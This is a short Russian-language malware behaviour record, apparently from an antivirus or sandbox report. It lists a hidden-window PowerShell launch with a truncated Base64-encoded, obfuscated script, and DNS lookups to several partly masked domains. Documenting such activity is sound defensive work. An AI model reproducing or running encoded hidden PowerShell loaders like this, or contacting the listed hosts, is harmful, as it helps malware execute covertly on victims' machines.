Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcANgAwADEAMgA3ADQAYgAwADkAMgB4AD0AJwB4AHgAMAA1ADQANgA3ADcANAA0ADgAMAAnADsAJAB4ADEAYgAzADAAMgB...
- DNS ASK bu###esbyb.com
- DNS ASK cr######hristicraddick.com
- DNS ASK fl####iatic.co.nz
- DNS ASK bo####ergyng.com
- DNS ASK fl#####odysports.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADcANgAwADEAMgA3ADQAYgAwADkAMgB4AD0AJwB4AHgAMAA1ADQANgA3ADcANAA0ADgAMAAnADsAJAB4ADEAYgAzADAAMgB...' (со скрытым окном)